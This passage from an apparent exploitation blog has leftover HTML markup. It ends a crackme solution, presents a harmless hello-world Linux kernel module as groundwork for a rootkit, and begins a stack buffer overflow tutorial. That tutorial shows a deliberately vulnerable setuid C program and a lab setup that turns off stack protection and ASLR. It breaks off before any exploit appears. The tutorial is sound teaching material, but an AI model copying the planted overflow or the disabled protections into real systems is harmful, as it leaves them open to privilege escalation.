class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"atoi/spanspan class="p"(/spanspan class="n"check/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"converted/spanspan class="p"[/spanspan class="n"c/spanspan class="p"]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="sc"#39;\0#39;/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"converted/spanspan class="p",/spanspan class="w" /spanspan class="n"ANSWER/spanspan class="p")/spanspan class="w" /spanspan class="o"==/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;The Password translates into %s, quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"converted/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"good/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"else/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"nope/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pThis works on both 64 bit and 32 bit systems. There are only 3 changes here, the size of the character array codeconverted/code on line 21 has increased to 9, meaning it now has the space to store the extra null terminator. The call to codememset/code to fill the array with null characters and lastly the explicit null terminator on line 40, it should already be null from the call to codememset/code but just incase./p pThat concludes this crackme solution. I hope you enjoyed it./p pHappy Hacking :-)/p

eXploit
First LKM0xe7
10 May 2014 at 07:46

First LKM

eXploit

By: 0xe7

10 May 2014 at 07:46

pA a href="https://en.wikipedia.org/wiki/Loadable_kernel_module" target="_blank"loadable kernel module/a (LKM) is the easiest way to create a a href="https://en.wikipedia.org/wiki/Rootkit" target="_blank"rootkit/a, although it is also the most noisy and easiest to defend against. Once root (or system level privileges) is gained on a machine, a rootkit is the best way to maintain root access to that machine./p pHere I will try to explain the basics of what a LKM actually is and how to create and test a very basic one for a href="https://en.wikipedia.org/wiki/Linux" target="_blank"Linux/a./p !--more-- pAn LKM is a plugin to the a href="https://en.wikipedia.org/wiki/Kernel_%28computing%29" target="_blank"kernel/a. It allows you to run code with the same permissions as the kernel, which isn't possible for normal a href="https://en.wikipedia.org/wiki/User_space" target="_blank"userland/a applications. a href="https://en.wikipedia.org/wiki/Device_driver" target="_blank"Device drivers/a are LKM's as they need permission to access the computers hardware, so either with or without knowing it, you already have some experience with LKM's. Throughout this post I will be using LKM and module interchangeably./p h2Creating A Hello World LKM/h2 pHere is the code for the LKM that we will be creating:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/module.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;linux/init.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="n"MODULE_AUTHOR/spanspan class="p"(/spanspan class="s"quot;0xe7, 0x1equot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_DESCRIPTION/spanspan class="p"(/spanspan class="s"quot;A simple hello world modulequot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"MODULE_LICENSE/spanspan class="p"(/spanspan class="s"quot;GPLquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"__init/spanspan class="w" /spanspan class="nf"hello_init/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="s"quot;Hello World!/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="mi"0/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"static/spanspan class="w" /spanspan class="kt"void/spanspan class="w" /spanspan class="n"__exit/spanspan class="w" /spanspan class="nf"hello_exit/spanspan class="p"(/spanspan class="kt"void/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printk/spanspan class="p"(/spanspan class="s"quot;Unloading hello./spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="n"module_init/spanspan class="p"(/spanspan class="n"hello_init/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="n"module_exit/spanspan class="p"(/spanspan class="n"hello_exit/spanspan class="p");/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pLines 4 and 5 and just some information about the module. Line 6 is needed otherwise when we load the module we get the following error message in the systems log:/p pcodehello: module license 'unspecified' taints kernel./code/p pThe module will still load but as we are learning to write a rootkit, we want as little 'noise' as possible./p pThe function codehello_init/code on lines 8 - 12 runs when the module is loaded, here we are just printing "Hello World!\n" to the system log. The function codehello_exit/code on lines 14 - 18 runs when the module is unloaded, here we are just printing "Unloading hello.\n" to the system log. They are defined as such on lines 20 and 21./p h2Compiling The LKM/h2 pTo a href="https://en.wikipedia.org/wiki/Compiler" target="_blank"compile/a it we need a codeMakefile/code, the makefile below will do:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/span span class="code-line"span class="normal"6/span/span span class="code-line"span class="normal"7/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="nv"obj-m/span span class="o"+=/span hello.o/span span class="code-line"/span span class="code-line"span class="nf"all/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span modules/span span class="code-line"/span span class="code-line"span class="nf"clean/spanspan class="o":/span/span span class="code-line" make -C /lib/modules/span class="k"$(/spanshell uname -rspan class="k")/span/build span class="nv"M/spanspan class="o"=/spanspan class="k"$(/spanPWDspan class="k")/span clean/span span class="code-line"/code/pre/div /td/tr/table pWith both of these files in the same directory we can now compile our first LKM:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanmake/span span class="code-line"span class="go"make -C /lib/modules/3.12-kali1-686-pae/build M=/root/lkms modules/span/span span class="code-line"span class="go"make[1]: Entering directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="go" CC [M] /root/lkms/hello.o/span/span span class="code-line"span class="go" Building modules, stage 2./span/span span class="code-line"span class="go" MODPOST 1 modules/span/span span class="code-line"span class="go" CC /root/lkms/hello.mod.o/span/span span class="code-line"span class="go" LD [M] /root/lkms/hello.ko/span/span span class="code-line"span class="go"make[1]: Leaving directory `/usr/src/linux-headers-3.12-kali1-686-pae#39;/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanls -l/span span class="code-line"span class="go"total 160/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 384 May 12 19:35 hello.c/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 70621 May 12 19:35 hello.ko/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 650 May 12 19:35 hello.mod.c/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 39088 May 12 19:35 hello.mod.o/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 32540 May 12 19:35 hello.o/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 156 May 12 19:35 Makefile/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 27 May 12 19:35 modules.order/span/span span class="code-line"span class="go"-rw-r--r-- 1 root root 0 May 12 19:35 Module.symvers/span/span span class="code-line"/code/pre/div /td/tr/table pAs we can see, the codemake/code command has created a number of files (codehello.ko/code, codehello.mod.c/code, codehello.mod.o/code, codehello.o/code, codemodules.order/code, codeModule.symvers/code). The file we are interested in is codehello.ko/code on line 13, this is our module./p h2Loading/Unloading The LVM/h2 pI am using a 32 bit a href="https://www.debian.org/" target="_blank"Debian/a based Linux system (a href="http://www.kali.org/" target="_blank"Kali/a) for my development environment but this should work on any modern Linux system (Do not try this on a production machine! Working with the kernel always has the possiblity to crash the kernel and bring the whole system down! You have been warned!), older systems might require some changes./p pHere is how we load and unload the module; and check that everything has worked:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~/lkms# /spanuname -r/span span class="code-line"span class="go"3.12-kali1-686-pae/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spaninsmod ./hello.ko/span span class="code-line"span class="gp"root@dev:~/lkms# /spandmesg span class="p"|/span tail -n span class="m"1/span/span span class="code-line"span class="go"[692908.561165] Hello World!/span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanlsmod span class="p"|/span grep hello/span span class="code-line"span class="go"hello 12363 0 /span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanrmmod hello/span span class="code-line"span class="gp"root@dev:~/lkms# /spandmesg span class="p"|/span tail -n span class="m"1/span/span span class="code-line"span class="go"[692925.071683] Unloading hello./span/span span class="code-line"span class="gp"root@dev:~/lkms# /spanlsmod span class="p"|/span grep hello/span span class="code-line"span class="gp"root@dev:~/lkms#/span/span span class="code-line"/code/pre/div /td/tr/table pSo first I have shown you the Linux kernel version I am using with the codeuname/code command on line 1, this is just so if it doesn't work for you, you can check if they are the same version. The codeinsmod/code command is used to load the module on line 3 and we check the system log to make sure it has printed the string "Hello World!\n" using the codedmesg/code command on line 4. The codelsmod/code command is used on line 6 to check if the module is actually loaded. The codermmod/code command is used on line 8 to unload the module and the system log is checked again on line 9 to check that our printk has run correctly. Lastly we check with codelsmod/code again to make sure the module has been unloaded correctly./p pSo we have a working LKM./p h2Conclusion/h2 pIt is very easy to make mistakes with any programming but the majority of mistakes in a normal application will not bring a system down. While its always important to build and test code in a development environment, its even more important when coding an application that runs in kernelland as any tiny mistake can, and most likely will, bring the system down./p pHappy Hacking :-)/p

eXploit
Plain Buffer Overflow0xe7
8 May 2014 at 16:35

Plain Buffer Overflow

eXploit

By: 0xe7

8 May 2014 at 16:35

pThis is the start of a series of tutorials exploring how to detect and exploit a href="https://en.wikipedia.org/wiki/Stack_%28abstract_data_type%29" target="_blank"stack/a based vulnerabilities on x86-32 Linux systems. As this is the first it will involve detecting and exploiting a a href="https://en.wikipedia.org/wiki/Buffer_overflow" target="_blank"buffer overflow/a on a system with no protections in place. Modern protections will be explored in future tutorials but its important to understand the basics before trying to take on the more complex situations./p pA buffer overflow happens when a programmer has not done sufficient bounds checking while or before copying the contents of one buffer into another. A buffer is normally a variable array (stack) or memory allocated using a dynamic memory allocation function (a href="https://en.wikipedia.org/wiki/Memory_management#Dynamic_memory_allocation" target="_blank"heap/a). We will be concentrating on stack based (variable array) buffer overflows at first as they are much easier to understand for beginners./p pAll of the code in this tutorial was written by the author./p !--more-- h2The Vulnerable App/h2 pBelow is the source code of the vulnerable application that we will be attacking. It is written in a href="https://en.wikipedia.org/wiki/C_%28programming_language%29" target="_blank"C/a./p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/span span class="code-line"span class="normal"50/span/span span class="code-line"span class="normal"51/span/span span class="code-line"span class="normal"52/span/span span class="code-line"span class="normal"53/span/span span class="code-line"span class="normal"54/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="cp"#define PASS quot;topsecretpasswordquot;/span/span span class="code-line"/span span class="code-line"span class="cp"#define SFILE quot;secret.txtquot;/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"p/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"**/spanspan class="n"argv/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"2/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot; lt;passwordgt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"checkpass/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"r/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="mi"0/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Wrong password: quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printfile/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"checkpass/spanspan class="p"(/spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"a/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"p/spanspan class="p"[/spanspan class="mi"512/spanspan class="p"];/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"strncpy/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"a/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"a/spanspan class="p")/spanspan class="o"+/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"r/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"strcmp/spanspan class="p"(/spanspan class="n"p/spanspan class="p",/spanspan class="w" /spanspan class="n"PASS/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"return/spanspan class="w" /spanspan class="n"r/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="kt"void/spanspan class="w" /spanspan class="nf"printfile/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"FILE/spanspan class="w" /spanspan class="o"*/spanspan class="n"f/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="n"c/spanspan class="p";/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"f/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"fopen/spanspan class="p"(/spanspan class="n"SFILE/spanspan class="p",/spanspan class="w" /spanspan class="s"quot;rquot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="w" /spanspan class="p"(/spanspan class="n"f/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="k"while/spanspan class="w" /spanspan class="p"((/spanspan class="n"c/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getc/spanspan class="p"(/spanspan class="n"f/spanspan class="p"))/spanspan class="w" /spanspan class="o"!=/spanspan class="w" /spanspan class="n"EOF/spanspan class="p")/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"putchar/spanspan class="p"(/spanspan class="n"c/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"fclose/spanspan class="p"(/spanspan class="n"f/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w" /spanspan class="k"else/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Error opening file: quot;/spanspan class="w" /spanspan class="n"SFILE/spanspan class="w" /spanspan class="s"quot;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"1/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table h3The Fix/h3 pThe code in the above application that is vulnerable to a stack based buffer overflow is on line 36 (codestrncpy(p, a, strlen(a)+1);/code). Here the programmer has wrongly calculated the maximum number of bytes that can be copied into the buffer codep/code as codestrlen(a)+1/code, this calculation is in fact based on the length of the input provided by the user and is controled by the user. To fix this vulnerability, this line should be changed to codestrncpy(p, a, sizeof(p)-1);/code or codestrncpy(p, a, 511);/code, we minus the 1 byte to leave space for the terminating null character 'code\0/code'. For more information about strncpy see a href="http://linux.die.net/man/3/strncpy" target="_blank"man strncpy/a./p h2Setting Up The Environment/h2 pThis is how to setup the environment in full on a a href="https://www.debian.org/" target="_blank"Debian/a based system:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span class="normal"48/span/span span class="code-line"span class="normal"49/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"root@dev:~# /spanadduser testuser/span span class="code-line"span class="go"Adding user `testuser#39; .../span/span span class="code-line"span class="go"Adding new group `testuser#39; (1001) .../span/span span class="code-line"span class="go"Adding new user `testuser#39; (1001) with group `testuser#39; .../span/span span class="code-line"span class="go"Creating home directory `/home/testuser#39; .../span/span span class="code-line"span class="go"Copying files from `/etc/skel#39; .../span/span span class="code-line"span class="go"Enter new UNIX password: /span/span span class="code-line"span class="go"Retype new UNIX password: /span/span span class="code-line"span class="go"passwd: password updated successfully/span/span span class="code-line"span class="go"Changing the user information for testuser/span/span span class="code-line"span class="go"Enter the new value, or press ENTER for the default/span/span span class="code-line"span class="go" Full Name []: /span/span span class="code-line"span class="go" Room Number []: /span/span span class="code-line"span class="go" Work Phone []: /span/span span class="code-line"span class="go" Home Phone []: /span/span span class="code-line"span class="go" Other []: /span/span span class="code-line"span class="go"Is the information correct? [Y/n]/span/span span class="code-line"span class="gp"root@dev:~# /spanls/span span class="code-line"span class="go"app.c/span/span span class="code-line"span class="gp"root@dev:~# /spangcc -z execstack -fno-stack-protector -o app app.c/span span class="code-line"span class="gp"root@dev:~# /spancp app /home/testuser//span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space /span span class="code-line"span class="go"2/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"echo/span span class="m"0/span gt; /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="gp"root@dev:~# /spancat /proc/sys/kernel/randomize_va_space/span span class="code-line"span class="go"0/span/span span class="code-line"span class="gp"root@dev:~# /spanspan class="nb"cd/span /home/testuser//span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwxr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanchmod u+s app/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanspan class="nb"echo/span span class="err"#39;/spanThis is a top secret file!/span span class="code-line"span class="go"gt; Only people with the password should be able to view this file!#39; gt; secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw-r--r-- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanchmod span class="m"600/span secret.txt/span span class="code-line"span class="gp"root@dev:/home/testuser# /spanls -l secret.txt/span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spancat secret.txt/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="gp"root@dev:/home/testuser# /spansu - testuser/span span class="code-line"span class="gp"testuser@dev:~$ /spanls -l app/span span class="code-line"span class="go"-rwsr-xr-x 1 root root 6242 Apr 17 16:48 app/span/span span class="code-line"span class="gp"testuser@dev:~$ /spanls -l secret.txt /span span class="code-line"span class="go"-rw------- 1 root root 91 May 9 13:40 secret.txt/span/span span class="code-line"span class="gp"testuser@dev:~$ /spancat secret.txt/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pSo our environment is setup and ready for exploit development. Firstly a testuser is added to run the application as, then on line 20 the application is compiled with stack protections removed. On line 24 ASLR is disabled and on line 30 the application has the setuid bit set so that when run the application can 